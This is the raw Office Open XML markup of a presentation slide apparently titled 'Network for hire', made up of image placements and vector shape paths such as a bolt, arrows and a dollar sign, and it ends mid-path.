            <a:ext cx="3879850" cy="4959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/>
            <a:r>
              <a:rPr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Network for hire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649413" y="1618615"/>
            <a:ext cx="8893175" cy="4627880"/>
            <a:chOff x="1536" y="2169"/>
            <a:chExt cx="14005" cy="7288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="object 2"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId2"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5906" y="5226"/>
              <a:ext cx="1690" cy="1765"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="object 3"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="0">
              <a:off x="3945" y="2169"/>
              <a:ext cx="11596" cy="7288"/>
              <a:chOff x="981075" y="1590611"/>
              <a:chExt cx="7058659" cy="4436110"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="object 4"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId4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868926" y="5151437"/>
                <a:ext cx="401637" cy="423862"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="object 5"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId6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868926" y="4445063"/>
                <a:ext cx="401637" cy="423862"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="8" name="object 6"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId7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303776" y="3384486"/>
                <a:ext cx="403225" cy="423862"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="9" name="object 7"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId8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303776" y="4021137"/>
                <a:ext cx="403225" cy="423862"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="11" name="object 8"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId9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303776" y="5434012"/>
                <a:ext cx="403225" cy="423862"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="object 9"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId10"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3848100" y="2557145"/>
                <a:ext cx="1335405" cy="241935"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1335404" h="241935">
                    <a:moveTo>
                      <a:pt x="868426" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="609600" y="73025"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217042" y="31622"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="92837"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392557" y="134238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135127" y="206882"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="466216" y="241680"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="723646" y="169163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1118235" y="210692"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1335277" y="149478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="940688" y="107822"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1199514" y="34925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="868426" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FDA400"/>
              </a:solidFill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bject 10"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId11"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3848100" y="2557145"/>
                <a:ext cx="1335405" cy="241935"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1335404" h="241935">
                    <a:moveTo>
                      <a:pt x="868426" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="915724" y="4960"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="963022" y="9934"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1010321" y="14918"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1057619" y="19912"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1104918" y="24913"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1152216" y="29917"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1199514" y="34925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1147713" y="49492"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1095935" y="64078"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1044176" y="78669"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="992429" y="93255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="940688" y="107822"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="990028" y="113056"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1039366" y="118278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1088700" y="123492"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1138031" y="128698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1187355" y="133898"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1236672" y="139094"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1285980" y="144287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1335277" y="149478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1281058" y="164794"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1226804" y="180086"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1172525" y="195377"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1118235" y="210692"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1068900" y="205501"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1019575" y="200310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="970256" y="195119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="920940" y="189928"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="871624" y="184737"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="822305" y="179546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="772980" y="174355"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="723646" y="169163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="672148" y="183655"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="620668" y="198164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="569194" y="212680"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="517714" y="227189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="466216" y="241680"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="418918" y="236720"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371620" y="231749"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324321" y="226772"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277023" y="221791"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229724" y="216814"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182426" y="211843"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135127" y="206882"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186625" y="192342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238105" y="177819"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289579" y="163302"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341059" y="148779"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392557" y="134238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="343497" y="129053"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294429" y="123876"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245355" y="118705"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196278" y="113537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147201" y="108370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98127" y="103199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49059" y="98022"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="92837"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54272" y="77521"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108521" y="62229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162770" y="46938"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217042" y="31622"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266138" y="36772"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315223" y="41931"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="364300" y="47100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413369" y="52276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462432" y="57458"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="511490" y="62644"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="560546" y="67834"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609600" y="73025"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661353" y="58395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="713124" y="43772"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="764901" y="29161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="816672" y="14568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="868426" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:ln w="909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bject 11"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId12"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2463672" y="2052574"/>
                <a:ext cx="1613535" cy="1341755"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1613535" h="1341754">
                    <a:moveTo>
                      <a:pt x="1546269" y="38940"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1322197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16128" y="1341754"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1562499" y="58518"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1546269" y="38940"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="1613535" h="1341754">
                    <a:moveTo>
                      <a:pt x="1599478" y="30861"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1556003" y="30861"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1572260" y="50418"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1562499" y="58518"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1578737" y="78104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1599478" y="30861"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="1613535" h="1341754">
                    <a:moveTo>
                      <a:pt x="1556003" y="30861"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1546269" y="38940"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1562499" y="58518"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1572260" y="50418"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1556003" y="30861"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="1613535" h="1341754">
                    <a:moveTo>
                      <a:pt x="1613027" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1530096" y="19430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1546269" y="38940"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1556003" y="30861"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1599478" y="30861"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161302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object 12"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId13"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3881501" y="2678176"/>
                <a:ext cx="1268730" cy="2473325"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1268729" h="2473325">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="919099"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="1268729" h="2473325">
                    <a:moveTo>
                      <a:pt x="704850" y="69723"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="704850" y="706374"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="1268729" h="2473325">
                    <a:moveTo>
                      <a:pt x="1268349" y="69723"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1268349" y="919099"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="1268729" h="2473325">
                    <a:moveTo>
                      <a:pt x="635000" y="1130300"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="635000" y="1342898"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="1268729" h="2473325">
                    <a:moveTo>
                      <a:pt x="635000" y="1766824"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="635000" y="1977898"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="1268729" h="2473325">
                    <a:moveTo>
                      <a:pt x="1198499" y="1484249"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1198499" y="1766824"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="1268729" h="2473325">
                    <a:moveTo>
                      <a:pt x="1198499" y="2190623"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1198499" y="2473198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object 13"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId14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637526" y="5151437"/>
                <a:ext cx="401637" cy="423862"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="17" name="object 14"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId15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637526" y="4445063"/>
                <a:ext cx="401637" cy="423862"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="18" name="object 15"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId16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637526" y="3667061"/>
                <a:ext cx="401637" cy="423862"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="19" name="object 16"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId17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73900" y="3384486"/>
                <a:ext cx="401637" cy="423862"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="20" name="object 17"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId18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191000" y="1709674"/>
                <a:ext cx="649287" cy="685800"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="21" name="object 18"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId20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73900" y="4021137"/>
                <a:ext cx="401637" cy="423862"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="22" name="object 19"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId21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459601" y="4373562"/>
                <a:ext cx="401637" cy="423862"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="23" name="object 20"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId22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73900" y="4727511"/>
                <a:ext cx="401637" cy="423862"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="24" name="object 21"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId23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73900" y="5434012"/>
                <a:ext cx="401637" cy="423862"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="25" name="object 22"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId24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459601" y="5080000"/>
                <a:ext cx="401637" cy="425450"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="26" name="object 23"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId25"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4503801" y="5872162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0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="141287"/>
                    </a:lnTo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bject 24"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId26"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1395476" y="2992374"/>
                <a:ext cx="76200" cy="302133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3021329">
                    <a:moveTo>
                      <a:pt x="50673" y="63500"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="25273" y="63500"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25273" y="3021076"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50673" y="3021076"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50673" y="63500"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="76200" h="3021329">
                    <a:moveTo>
                      <a:pt x="38100" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="76200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25273" y="76200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25273" y="63500"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69850" y="63500"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38100" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="76200" h="3021329">
                    <a:moveTo>
                      <a:pt x="69850" y="63500"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="50673" y="63500"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50673" y="76200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76200" y="76200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69850" y="635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bject 25"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId27"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1433576" y="6000750"/>
                <a:ext cx="60166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016625" h="6350">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6016625" y="6350"/>
                    </a:lnTo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bject 26"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId28"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3163951" y="5635625"/>
                <a:ext cx="186055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79400">
                    <a:moveTo>
                      <a:pt x="60451" y="173215"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="180543"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1500" y="188056"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3333" y="194992"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23368" y="227634"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62801" y="247065"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="249936"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="279400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="279400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="249936"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113510" y="249326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154104" y="235485"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177356" y="209232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="209232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="207683"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="207683"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75818" y="204139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70720" y="200060"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64643" y="190944"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62230" y="183515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60451" y="173215"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="186054" h="279400">
                    <a:moveTo>
                      <a:pt x="183496" y="159207"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="104648" y="159207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114300" y="162737"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120903" y="166560"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127508" y="174802"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129159" y="179311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129159" y="189839"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127253" y="194919"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119379" y="204000"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113157" y="207251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="209232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177356" y="209232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185552" y="174802"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184411" y="162255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183496" y="159207"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="186054" h="279400">
                    <a:moveTo>
                      <a:pt x="104648" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="82804" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="15430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65488" y="17485"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27305" y="36106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8817" y="80454"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8712" y="83832"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9209" y="92282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28035" y="129119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68756" y="148364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="152590"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="207683"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="207683"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="159207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183496" y="159207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155957" y="121298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="101549"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="95758"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="95758"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76454" y="93472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72009" y="90627"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66929" y="83832"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65659" y="79844"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65659" y="70853"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66929" y="67043"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69468" y="63804"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71881" y="60566"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76326" y="57861"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="55664"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173813" y="55664"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170608" y="48958"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134254" y="20659"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="15430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="186054" h="279400">
                    <a:moveTo>
                      <a:pt x="173813" y="55664"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="82804" y="55664"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="95758"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="95758"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="56438"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174184" y="56438"/>
